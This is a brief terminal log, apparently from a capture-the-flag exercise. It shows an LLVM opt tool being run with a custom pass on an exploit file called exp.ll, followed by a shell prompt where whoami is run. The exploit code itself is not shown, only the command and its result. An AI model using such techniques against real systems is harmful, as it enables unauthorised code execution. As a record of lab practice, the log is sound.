ayoung@ubuntu:~/pwn/llvm$ ./opt-8 -load ./VMPass.so -VMPass ./exp.ll
WARNING: You're attempting to print out a bitcode file.
This is inadvisable as it may cause display problems. If
you REALLY want to taste LLVM bitcode first-hand, you
can force output with the `-f' option.

$ whoami
ayoung
$ 

reference